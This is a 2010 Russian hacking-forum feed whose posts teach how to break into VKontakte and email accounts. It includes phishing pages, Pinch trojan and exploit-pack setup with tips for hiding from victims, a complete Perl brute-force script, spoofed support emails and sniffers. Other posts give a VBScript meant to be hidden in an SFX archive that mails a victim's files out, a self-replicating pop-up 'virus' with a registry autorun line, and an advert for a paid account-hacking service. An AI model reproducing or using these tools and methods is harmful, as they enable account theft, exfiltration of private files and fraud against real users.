http://xakerok.forumchik.ru/ XaKeRoK ru-ru Sat, 06 Mar 2010 14:11:15 +0300 MyBB/mybb.ru http://xakerok.forumchik.ru/viewtopic.php?pid=8#p8 <p>Так как частенько новички стали задовать вопросы о том как взломать учетку вконтакте, то решил написать статью-мануал по этому поводу, которая поможет получить ответы на многие вопросы. <br />--------------------------------------------------------------- <br />10 способов взлома анкеты vkontakte.ru <br />--------------------------------------------------------------- <br />Что нам потребуется: <br />Умение настраивать пинч(если это у вас уже получилось, то остальные 2 требования можно не смотреть) <br />Прямые руки <br />Хоть капелька мозга <br />1) Через мыло, если мы его знаем то уже все проще, ведь имеется как минимум 15 методов взлома почты...НО есть и еще один минус, если пароль &quot;корявый&quot;, он </p> <p>разумеется надежный, но с его восстановлением проблемы, когда такой высылают на почту, то он принемает &quot;левый&quot; вид, и соответственно не работает. не в этом </p> <p>суть, поэтому останавливаться не будем <br />2) Фейк, достаточно простой способ, кидаем ссылку жертве любым способом(ася, через лс и тд) скачать его можно по ссылке <a href="http://slil.ru/25774471" rel="nofollow" target="_blank">http://slil.ru/25774471</a> <br />3) Троян. Эту категорию мы разделим на другие. <br />а) Скинуть &quot;чистый&quot; файл, либо ссылку на загрузку его, но тут еще надо чтобы пользователь его запустил. <a href="http://slil.ru/25774480" rel="nofollow" target="_blank">http://slil.ru/25774480</a> - здесь лежит билдер пинча, а </p> <p>здесь парсер <a href="http://slil.ru/25774491" rel="nofollow" target="_blank">http://slil.ru/25774491</a> , если вы захотите чтобы отчеты шли на гейт - вот подходящий от Генома - <a href="http://slil.ru/25774495" rel="nofollow" target="_blank">http://slil.ru/25774495</a> <br />б) кейлогер - менее полезный, но если жертва его &quot;словит&quot; и вы покопаетесь(причем оочень долго) с отчетом, то пароль получите 100% <br />в) Сплоит, тут ничего сложного нету, НО ЕСТЬ МИНУС! Паблик сплоиты пробивают в основном ие6 и то, примерно, 6/10(имхо) <br />Советую армитаж(айс пак тоже в теме). Прост в настройке, нужно только создать базу мускуль(делается в пару кликов), и отредактировать файлы(db.php </p> <p>config.php), после того как зальете на хост, выставляем нужные права, на папку load - 777. config.php - 777 <br />Скачать 3 связки можно по ссылке <a href="http://slil.ru/25776403" rel="nofollow" target="_blank">http://slil.ru/25776403</a> - здесь лежат мпак, айспак и армитаж <br />ЗЫ когда будете настраивать пинч, устанавите права на гейт 775, на папку в которую будут идти отчеты - 777, и не забывайте что не надо называть папку с </p> <p>отчетами OtchetyOTpincha, имхо палевно, лучше назовите 404 или еще как, ну что бы внимания не привлекало...Папку в которой будет лежать сплоит, тоже </p> <p>переиминуйте на что-нить типа myphotos и тд... тк люди будут эту ссылку себе в браузер пихать, не нужно что бы там было написанно EXPLOIT...лишнее палево ни </p> <p>к чему... <br />Идем дальше... <br />Надеюсь, пинч уже настроен на гейт или почту, желательно что бы он еще и закриптованный был. <br />Заходим по ссылке на файл install.php нашего сплоита, а потом идем в админку, устанавливаем настройки, выбераем файл который будет грузится жертве, теперь он </p> <p>будет лежать в папке load под именем file. <br />Кидаем ссылку жертве, и ждем с надеждой что ее пробьет и отчет с паролем нам придет. <br />4)Брутфорс, как всем известно - перебор паролей. Способ долгий, и не всегда сработает(в случае пароля D5&amp;%-AefV) <br />Для этого брутфорсера нам потребуется активперл скачать мона тут <a href="http://download.softportal.com/softw...ctiveperl.html" rel="nofollow" target="_blank">http://download.softportal.com/softw...ctiveperl.html</a> либо по ссылке </p> <p><a href="http://www.denwer.ru/packages/perl.html" rel="nofollow" target="_blank">http://www.denwer.ru/packages/perl.html</a> <br />Код брутфорсера: <br />quote:</p> <p>#!/usr/bin/perl </p> <p>use IO::Socket; <br />use MD5; <br />use threads; <br />use threads::shared; <br />my @pass : shared; </p> <p>open (pass, &quot;&lt;$dic&quot;); </p> <p>Next: <br />@pass = pass(); </p> <p>for(0..$threads) {$trl[$_] = threads-&gt;create(\&amp;Brut, $_);} <br />for(@trl) { $_-&gt;join; } </p> <p>sub Brut <br />{ </p> <p>while (@pass){ </p> <p>$pass = shift @pass; </p> <p>$md5 = MD5-&gt;hexhash($pass); <br />$sock = IO::Socket::INET-&gt;new(Proto=&gt;'tcp',PeerAddr=&gt;'vkontakte.ru',PeerPort=&gt;80); <br />print $sock &quot;HEAD <a href="http://vkontakte.ru/" rel="nofollow" target="_blank">http://vkontakte.ru/</a> HTTP/1.0\r\n&quot;. <br />&quot;Host: vkontakte.ru\r\n&quot;. <br />&quot;Accept: */*\r\n&quot;. <br />&quot;Content-Type: application/x-www-form-urlencoded\r\n&quot;. <br />&quot;User-Agent: Mozillo\r\n&quot;. <br />&quot;Cookie: remixchk=2; remixmid=$id; remixemail=$mail; remixpass=$md5\r\n&quot;. <br />&quot;Connection: close\r\n\r\n&quot;; <br />$answ = &lt;$sock&gt;; <br />close $sock; <br />print &quot;$pass $answ&quot;; <br />if ($answ =~ /302/){ <br />open (good, '&gt;&gt;good.txt'); <br />print good &quot;$id:$pass:$md5\n&quot;; <br />print &quot;$id:$pass:$md5\n&quot;; <br />close good; <br />exit;} <br />} </p> <p>} </p> <p>goto Next; </p> <p>sub pass <br />{ <br />my (@mas); <br />while (&lt;pass&gt;){ <br />push @mas, $_; <br />last if (@mas == 400); <br />} <br />chomp @mas; <br />return @mas; <br />} </p> <p>Не забудьте сменить разширение на brut.pl <br />$dic = ‘passl.txt’; #паслист для брдутфорсера <br />$id = 1; #айдишник цели(его можно взять из адресной строки когда вы зашли на страницу жертвы) <br />$mail = ‘мыло’; #мыло, значек @ меняем на %40 <br />$threads = Х; # где Х - количество потоков <br />Если вам лень копаться со всем этим, то есть неплохой брут на С. Скачать его можно по ссылке <a href="http://slil.ru/25774498," rel="nofollow" target="_blank">http://slil.ru/25774498,</a> сразу говорю, если не запускается - это </p> <p>ваши проблемы, ибо все прекрасно работает! <br />5)Имхо самый надежный способ, открываем исходник нашего фейка, закидываем в него наш код iframe... <br />Теперь, когда жертва перейдет на нашу ссылку, мы увеличиваем вероятность того, что юзера пробьет, либо через браузер, либо через тупость, тк теперь у нас на </p> <p>ссылке комбинированная атака на мозг(фейк) и браузер(код iframe). <br />6)Способ приводится много где, здесь нужно поискать сайты на которых сидит жертва(форумы, почта и пр) и попытаться похекать что-то из вышеперечисленного, </p> <p>авось найдем старый заброшенный пароль, а он подойдет. <br />7) как обычно СИ, пробуем отправить письмо от адресата durov@vkontakte.ru или support@vkontakte.ru с текстом типа, ваша страница на сайте vkontakte.ru будет </p> <p>заблокированна через N дней, если вы не подтвердите какую-нить хрень, методом отправки нам пароля. <br />Или, можно прислать письмо типа, вам пришло личное сообщение/открытка и пр, от такого-то пользователя, что бы ее прочитать перейдите по ссылке, а ссылка </p> <p>будет вести на наш фейк. <br />Что-бы отправить письмо с &quot;левого&quot; адреса, нужен какой-нить майлер, например, этот <a href="http://softnic.ru/soft/programm_4223.html," rel="nofollow" target="_blank">http://softnic.ru/soft/programm_4223.html,</a> либо любой подходящий для вас </p> <p>из гугла. <br />Только не забудьте зарегить себе не привлекающее мыло, похожее на суппортское, и вписать его в поле копия.(что бы пароли пришли именно вам на почту) <br />8) Снифер, тут лучше отправлять его на почту(если мы знаем мыло), тогда мы без лишних проблем сможем перехватить сессию, и с помощью системы восстановления </p> <p>пароля на сайте вконтакте получить письмо с паролем. <br /><a href="http://forum.antichat.ru/showthread.php?p=457280" rel="nofollow" target="_blank">http://forum.antichat.ru/showthread.php?p=457280</a> <br />Есть сниферы и получше, но они платные, все же тема распространена и в гуле можно ввсести запрос на пхп снифер и найти много полезной инфы. <br />9)ХSS, паблик дырок на этом сайте нету, так что кража кукисов маловероятна, хотя если ооочень долго подождать, то можно и дождаться паблик уязвимости - но </p> <p>такой подход к делу бредовый, поэтому останавливаться на нем не будем. <br />10) Самый простой способ, единственное что от вас требуется - уметь работать с платежными системами и иметь деньги. Просто закажите взлом если вам не помог </p> <p>ни один из 9 пунктов, может найдется умелец который сломает неприступную жертву. Поискать такогого можно здесь - <a href="http://forum.xakep.ru/forumid_308/tt.htm" rel="nofollow" target="_blank">http://forum.xakep.ru/forumid_308/tt.htm</a> <br />Перед тем как задать вопрос воспользуйтесь полезными ссылками: <br />google.ru <br /><a href="http://www.poiskinfo.net/stat/st1.php" rel="nofollow" target="_blank">http://www.poiskinfo.net/stat/st1.php</a> <br /><a href="http://segfault.kiev.ua/smart-questions-ru.html" rel="nofollow" target="_blank">http://segfault.kiev.ua/smart-questions-ru.html</a> <br /><a href="http://penguin.kurgan.ru/doc/Perl/perlfaq1.htm" rel="nofollow" target="_blank">http://penguin.kurgan.ru/doc/Perl/perlfaq1.htm</a> <br />Ну и на последок - googleforidiots.com <br />На этом все, надеюсь вам не особо скучно было при чтении всего этого. <br />(с) [ NeitRoN]</p> mybb@mybb.ru (NeitRoN) Sat, 06 Mar 2010 14:11:15 +0300 http://xakerok.forumchik.ru/viewtopic.php?pid=8#p8 http://xakerok.forumchik.ru/viewtopic.php?pid=7#p7 <p>Конечно вы можете клеить вирусняги на прогах по шаблону, но лучше всего учите языки программирования и пишите свои... Свой первый вирус(если его можно так назвать) я написал отчасти на html, отчасти на JS сразу после того как познакомился с кодом для всплывающих окон и даже не ожидал, что Каспер запалит его как Trojan.Windbomb. Вообще многие вирусы основаны на принципе цикличности и засирают оперативку. Вот код того &quot;троянца&quot;: <br />&lt;html&gt; <br />&lt;head&gt; <br />&lt;title&gt; <br />Ваш комп при смерти. Ждите... <br />&lt;/title&gt; <br />&lt;sсriрt language=&quot;JavaScript&quot;&gt; <br />function virus() <br />{ <br />window.open('virus.html') <br />} <br />&lt;/sсriрt&gt; <br />&lt;/head&gt; <br />&lt;body bgcolor=&quot;black&quot; text=&quot;red&quot; onload=&quot;virus();&quot; onunload=&quot;virus()&quot;&gt; <br />&lt;center&gt; <br />&lt;font size=&quot;10&quot;&gt; <br />КОМПУ КАПУТ!!! <br />&lt;/font&gt; <br />&lt;/center&gt; <br />&lt;/body&gt; <br />&lt;/html&gt; </p> <p>Сохранить как virus.html. </p> <p>Поняли в чём дело? Мы ставим pop-up на само себя и в итоге, если чел вырубит блокировку всплывающих окон, они у него начнут плодиться, пока комп не висанёт! Можно помодернизировать, например, закинуть в автозагрузку, впихнув в &lt;head&gt; VBS-код: <br />&lt;sсriрt language=&quot;VBScript&quot;&gt; <br />s.regwrite&quot;HKEY_LOCAL_MACHINE\Software\Microsoft\W indows\CurrentVersion\Run\msdriver&quot; <br />&lt;/sсriрt&gt; </p> <p>Предварительно закинув на жесткий диск. Главное - ваша фантазия! </p> <p>А на BASIC'е можно вообще сделать элементарный засиратель оперативки, менее опасный, чем выше описанный: </p> <p>1 PRINT COMPUTER CAPUT!!! <br />2 GOTO 1 </p> <p>У чела миллион раз пишется &quot;COMPUTER CAPUT&quot; и приходится завершать работу программы. <br />Ну конечно последний &quot;вирус&quot; не несёт никакой опасности, просто его принцип можно использовать для написания настоящих вирусов, способных повесить систему. </p> <p>Удачи!!!</p> mybb@mybb.ru (NeitRoN) Sat, 06 Mar 2010 13:52:44 +0300 http://xakerok.forumchik.ru/viewtopic.php?pid=7#p7 http://xakerok.forumchik.ru/viewtopic.php?pid=4#p4 <p>Да есть, вставляй туда скрипт написанный на vbs он отсылает тебе файл(ы) на почту! Прикрепить его как и другие файлы можно если сделать из rar ---&gt; sfx. </p> <p>Вот сам скрипт... <br />quote:</p> <p>On Error Resume Next <br />Call SendPost(&quot;smtp.mail.ru&quot;, &quot;кому@mail.ru&quot;, &quot;от_кого@mail.ru&quot;, &quot;Subj&quot;, &quot;Body&quot;) <br />Function SendPost(strSMTP_Server, strTo, strFrom, strSubject, strBody) <br />Set iMsg = CreateObject(&quot;CDO.Message&quot;) <br />Set iConf = CreateObject(&quot;CDO.Configuration&quot;) <br />Set Flds = iConf.Fields </p> <p>Flds.Item(&quot;http://schemas.microsoft.com/cdo/configuration/sendusing&quot;) = 2 <br />Flds.Item(&quot;http://schemas.microsoft.com/cdo/configuration/smtpauthenticate&quot;) = 1 <br />Flds.Item(&quot;http://schemas.microsoft.com/cdo/configuration/sendusername&quot;) = &quot;ваш логин&quot; '- логин на smtp сервер <br />Flds.Item(&quot;http://schemas.microsoft.com/cdo/configuration/sendpassword&quot;) = &quot;ваш пароль&quot; 'пароль на smtp <br />Flds.Item(&quot;http://schemas.microsoft.com/cdo/configuration/smtpserver&quot;) = &quot;smtp.mail.ru&quot; 'собстно сам сервер <br />Flds.Item(&quot;http://schemas.microsoft.com/cdo/configuration/smtpserverport&quot;) = 25 'порт на smtp сервере </p> <p>Flds.Update <br />iMsg.Configuration = iConf <br />iMsg.To = strTo <br />iMsg.From = strFrom <br />iMsg.Subject = strSubject <br />iMsg.TextBody = strBody <br />iMsg.AddAttachment &quot;C:\readme.txt&quot; <br />iMsg.Send <br />End Function </p> <p>Set iMsg = Nothing <br />Set iConf = Nothing <br />Set Flds = Nothing</p> <p>iMsg.AddAttachment &quot;C:\readme.txt&quot; эта строчка отвечает за файл который посылать ( если сделаешь много таких строчек, то отсылаються несколько файлов!). </p> <p>Если еще какие то вопросы по этой теме пиши! Помог? Поставь плюс...</p> mybb@mybb.ru (NeitRoN) Sat, 06 Mar 2010 13:12:11 +0300 http://xakerok.forumchik.ru/viewtopic.php?pid=4#p4 http://xakerok.forumchik.ru/viewtopic.php?pid=3#p3 <p>Поможем узнать пароль от ICQ, от электронной почты: mail.ru, hotmail.com, <br />gmail.com, yandex.ru, rambler.ru, yahoo.com, pochta.ru, ukr.net, i@ua и <br />т.д., а также пароль к аккаунту: вконтакте, одноклассниках и других соц. <br />сетях. <br /></p> <p>Работаем без предоплаты. Оплата только по завершении работы и доказательств <br />успешно выполненного заказа: <br /></p> <p>1. После взлома высылаем письмо со взломанного ящика на Ваш; </p> <p>2. Даем личный инструктаж по безопасному использованию чужого аккаунта. </p> <p>После оплаты: пароль и ответ на секретный вопрос. </p> <p>Иных доказательств не предоставляем, по ящику не бродим, в чужую жизнь не <br />влезаем, вся ответственность по использованию чужого аккаунта лежит на Вас. </p> <p>Гарантируем полную Вашу анонимность. </p> <p>Стоимость определяется индивидуально, в зависимости от конкретного заказа. </p> <p>Вероятность взлома 95%, сроки 1 - 3 дня.</p> mybb@mybb.ru (NeitRoN) Sat, 06 Mar 2010 12:59:40 +0300 http://xakerok.forumchik.ru/viewtopic.php?pid=3#p3 http://xakerok.forumchik.ru/viewtopic.php?pid=2#p2 <p>Сайт vkontakte.ru на данный момент является чуть ли не самым известным сайтом для общения студентов и школьников. Я зарегистрировался на нем пару месяцев назад и нашел там почти всех своих бывших одноклассников и просто людей, с которыми я раньше общался, но потом по каким-то причинам потерял с ними связь. </p> <p>Я знаю, что где-то пол года назад (на том же сайте, в какой-то группе о ней было написано) там была уязвимость, которая позволяла любому человеку, знающему ID пользователя, зайти в его аккаунт. Нужно было подправить в кукисах параметры remixid и remixemail на те, что были у пользователя и все, аккаунт твой. Но сейчас туда ввели еще и remixpass - хэш пароля. После этого, использовать уязвимость не представлялось возможным. Нет, был случай, когда я дал одному человеку троян, украл кукисы с винча и подставил значения, но это был взлом компьютера пользователя, а не сайта. </p> <p>Зачем я все это пишу: я предлагаю вместе искать уязвимости на этом сайте и выкладывать свои результаты сюда. Не обязательно пытаться ломать весь сайт. Во-первых, это сложно и занимает много времени. Во-вторых, если кто его и сломает - вряд ли поделиться информацией о том, как он это сделал (хотя, х.з., бывают и добрые люди). Я сейчас говорю, допустим, об XSS, или, о чем-нибудь в этом роде. Пишите сюда, кто заинтересован. Можно сайт вместе поковырять. Я думаю, что эта тема будет интересна достаточно большому кругу людей<span style="display: block; text-align: center"></span></p> mybb@mybb.ru (NeitRoN) Sat, 06 Mar 2010 12:38:40 +0300 http://xakerok.forumchik.ru/viewtopic.php?pid=2#p2